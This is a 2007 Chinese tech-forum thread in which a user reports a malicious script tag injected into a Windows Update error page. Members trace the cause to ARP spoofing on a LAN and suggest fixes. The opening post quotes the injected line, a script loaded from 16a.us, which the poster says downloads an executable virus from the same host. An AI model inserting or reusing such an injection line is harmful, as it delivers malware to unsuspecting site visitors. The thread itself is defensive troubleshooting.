找回密码
 注册
快捷导航
查看: 5184|回复: 17

WINDOWS UPDATE网站被植入木马????

[复制链接] |自动提醒
阅读字号:

3490

回帖

4

积分

4938

资产值

初级会员 Rank: 1

注册时间
2003-2-17
铜牌荣誉勋章(注册8年以上会员)
发表于 2007-5-17 17:41:25| 字数 193| - 中国–安徽–合肥 电信 | 显示全部楼层 |阅读模式
我是正版的xp,今天无法上UPDATE更新。

在出错页面源代码的最顶端有一行代码:

<script src=http://16a.us/2.js></script>   
如下图:

这段JS程序会从http://16a.us/oKK/smss.exe 下载病毒体,瑞星最新版本的病毒库(19.23.32)可以查到此病毒packer.mian007。


是不是微软UPDATE被搞定了?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
R51 -> dell d610-> T61 8889-CN1 进化至4G,日立7K320 250G

652

回帖

0

积分

1743

资产值

入门会员 Rank: 1

注册时间
2005-1-27
发表于 2007-5-17 17:52:53| 字数 4| - 中国–上海–上海–静安区 电信 | 显示全部楼层
晕...
回复 支持 反对

使用道具 举报

1083

回帖

0

积分

1423

资产值

入门会员 Rank: 1

注册时间
2006-5-1
发表于 2007-5-17 17:54:54| 字数 24| - 中国–湖南–长沙 电信/湖南大学 | 显示全部楼层
*.*lll 不是吧  在盖大叔家门口挂马???!!!
人老了,心也老了
回复 支持 反对

使用道具 举报

5672

回帖

241

积分

9万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-4-19
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)年全勤勋章2018月全勤勋章年全勤勋章2022
发表于 2007-5-17 17:58:09| 字数 32| - 中国–甘肃–酒泉–敦煌市 电信/七里镇青海油田 | 显示全部楼层
跟那个可恶的4255.biz很类似,是不是局域网有什么机器中毒了
回复 支持 反对

使用道具 举报

3768

回帖

1

积分

4052

资产值

初级会员 Rank: 1

注册时间
2006-1-20
发表于 2007-5-17 18:05:21| 字数 73| - 中国–广东–广州–越秀区 电信 | 显示全部楼层
出错页面?楼主确认是微软的页面吗?
刚刚试了一下,可以更新,所以无法证实

某些本机的程序可以修改HTML代码然后再发送给浏览器解析
或者上了钓鱼网站……
回复 支持 反对

使用道具 举报

3490

回帖

4

积分

4938

资产值

初级会员 Rank: 1

注册时间
2003-2-17
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2007-5-17 18:12:38| 字数 114| - 中国–安徽–合肥–包河区 电信 | 显示全部楼层
QUOTE:
原帖由 marione 于 2007-5-17 17:58 发表
跟那个可恶的4255.biz很类似,是不是局域网有什么机器中毒了


我靠,家里的可以。单位试了几台机子都不行。局域网某台机子中毒,怎么会影响到其他机子上网?什么原理?
R51 -> dell d610-> T61 8889-CN1 进化至4G,日立7K320 250G
回复 支持 反对

使用道具 举报

3490

回帖

4

积分

4938

资产值

初级会员 Rank: 1

注册时间
2003-2-17
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2007-5-17 18:13:18| 字数 130| - 中国–安徽–合肥–包河区 电信 | 显示全部楼层
QUOTE:
原帖由 cxcx 于 2007-5-17 18:05 发表
出错页面?楼主确认是微软的页面吗?
刚刚试了一下,可以更新,所以无法证实

某些本机的程序可以修改HTML代码然后再发送给浏览器解析
或者上了钓鱼网站……


本机中毒的可能性微乎其微,不是我一台机器出现这种情况。
R51 -> dell d610-> T61 8889-CN1 进化至4G,日立7K320 250G
回复 支持 反对

使用道具 举报

3486

回帖

59

积分

2815

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2006-4-25
发表于 2007-5-17 18:21:32| 字数 7| - 中国–福建–福州 电信 | 显示全部楼层
是你自己中招了
回复 支持 反对

使用道具 举报

4228

回帖

39

积分

9132

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-9-21
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)
发表于 2007-5-17 18:22:21| 字数 375| - 中国–北京–北京–海淀区 联通 | 显示全部楼层
俄罗斯黑客成功劫持Windows Update的下载器

Background Intelligent Transfer Service -- 微软Windows Update等服务的重要后台程序,最近被黑客攻破,根据Symantec研究人员的消息,他们发现已经有黑客劫持了BITS,可以自由控制用户下载更新的内容,而BITS是完全被操作系统安全机制信任的服务,连防火墙都没有任何警觉.这意味着利用BITS,黑客可以很轻松地把恶意内容以合法的手段下载到用户的电脑并执行.



Symantec的研究人员同时也表示,目前他们发现的特洛伊正在尝试劫持,但并没有将恶意代码写入,也没有准备好提供给用户的"货",但提醒用户要提高警觉.

转自cnBeta.com

http://www.cnbeta.com/articles/26365.htm


以上,很可能已经被利用了
回复 支持 反对

使用道具 举报

3768

回帖

1

积分

4052

资产值

初级会员 Rank: 1

注册时间
2006-1-20
发表于 2007-5-17 18:52:45| 字数 93| - 中国–广东–广州–越秀区 电信 | 显示全部楼层
QUOTE:
原帖由 yuanhen 于 2007-5-17 18:13 发表


本机中毒的可能性微乎其微,不是我一台机器出现这种情况。

根据9楼的说法,这种微乎其微的可能性很可能降落到了不止楼主一台机上
回复 支持 反对

使用道具 举报

3490

回帖

4

积分

4938

资产值

初级会员 Rank: 1

注册时间
2003-2-17
铜牌荣誉勋章(注册8年以上会员)
 楼主| 发表于 2007-5-17 20:44:17| 字数 136| - 中国–安徽–合肥–包河区 电信 | 显示全部楼层
QUOTE:
原帖由 cxcx 于 2007-5-17 18:52 发表

根据9楼的说法,这种微乎其微的可能性很可能降落到了不止楼主一台机上
QUOTE:
原帖由 marione 于 2007-5-17 17:58 发表
跟那个可恶的4255.biz很类似,是不是局域网有什么机器中毒了



这个可能性很大。
R51 -> dell d610-> T61 8889-CN1 进化至4G,日立7K320 250G
回复 支持 反对

使用道具 举报

2634

回帖

74

积分

7万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2004-11-30
银牌荣誉勋章(注册10年以上会员)年全勤勋章2022铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2007-5-17 22:35:59| 字数 18| - 中国–山东 联通/BGP大带宽业务机柜段 | 显示全部楼层
看看你的host文件有没有被修改了。
回复 支持 反对

使用道具 举报

4万

回帖

16

积分

1万

资产值

中级会员 Rank: 2Rank: 2

注册时间
2002-12-1
银牌荣誉勋章(注册10年以上会员)
发表于 2007-5-18 09:51:35| 字数 398| - 中国–北京–北京 互联通 | 显示全部楼层
QUOTE:
原帖由 sokoo 于 2007-5-17 18:22 发表
俄罗斯黑客成功劫持Windows Update的下载器

Background Intelligent Transfer Service -- 微软Windows Update等服务的重要后台程序,最近被黑客攻破,根据Symantec研究人员的消息,他们发现已经有黑客劫持了BI ...


那人写文章太不负责了,人家原话是
"Symantec first caught chatter about BITS on Russian hacker messageboards late last year, Friedrichs added, and has been on the lookoutfor it since. A Trojan spammed in March was one of the first to put thetechnique into practice."
并不是说就是俄罗斯黑客干的.
®™TheBestIsDoingTheRightThingsRightAtTheRightTime
Keep Going Forward with Your life!!
回复 支持 反对

使用道具 举报

501

回帖

0

积分

658

资产值

入门会员 Rank: 1

注册时间
2007-3-16
发表于 2007-5-18 10:32:45| 字数 11| - 美国–华盛顿州–金–雷德蒙德 Microsoft | 显示全部楼层
关注... *.*lll
X60-B57
回复 支持 反对

使用道具 举报

2415

回帖

0

积分

3167

资产值

入门会员 Rank: 1

注册时间
2006-3-2
发表于 2007-5-18 12:23:51| 字数 594| - 中国–广东–广州 广电网 | 显示全部楼层

没有的事情,楼主自己被搞定了吧

<html dir='ltr'>
<head>
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North America Server" by "inet@microsoft.com" on "1997.06.30T14:48-0500" r (n 0 s 0 v 0 l 0))' />
<meta http-equiv='Content-Type' content='text/html;charset=gb2312' />
<meta http-equiv='MSThemeCompatible' content='yes' />
<title>Microsoft Update</title>
<link rel='shortcut icon' href='shared/images/bannersmu/favicon.ico' type='image/x-icon'/>
<meta name='MSSmartTagsPreventParsing' content='yes' />
回复 支持 反对

使用道具 举报

2

回帖

0

积分

12

资产值

入门会员 Rank: 1

注册时间
2007-5-23
发表于 2007-5-23 11:12:29| 字数 125| - 中国–浙江–杭州 电信 | 显示全部楼层
16a.us病毒(又一次ARP病毒欺骗攻击)解决方案,具体步骤请查看:
http://www.maihu.net/tech/view_227.html
基本原理是将网关的MAC地址进行静态绑定,我已经按照这个办法解决了我们单位局域网所有电脑上的这个问题。
回复 支持 反对

使用道具 举报

2

回帖

0

积分

12

资产值

入门会员 Rank: 1

注册时间
2007-5-23
发表于 2007-5-27 19:51:01| 字数 262| - 中国–浙江–杭州 电信 | 显示全部楼层
最近很多朋友都遇到16a.us病毒困挠,我的上一篇文章 《16a.us病毒(又一次ARP病毒欺骗攻击)解决方案http://www.maihu.net/tech/view_227.html》,只是简单绕过问题或者说是没有治本,昨天在我的网站转载了一篇新文章《处理“元凶”,彻底根除16a.us病毒http://www.maihu.net/tech/view_233.html》(是我的一个好朋友写的),希望对还处在16a.us病毒困挠的朋友们能够有所帮助!
============
麦糊网(maihu.net)-网站运营聚合门户
回复 支持 反对

使用道具 举报

287

回帖

0

积分

295

资产值

入门会员 Rank: 1

注册时间
2005-12-4
发表于 2007-5-27 21:45:03| 字数 3| - 中国–湖南–长沙 电信 | 显示全部楼层
  ARP
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2025-1-10 19:11 , Processed in 0.202787 second(s), 62 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|在线留言|专门网

返回顶部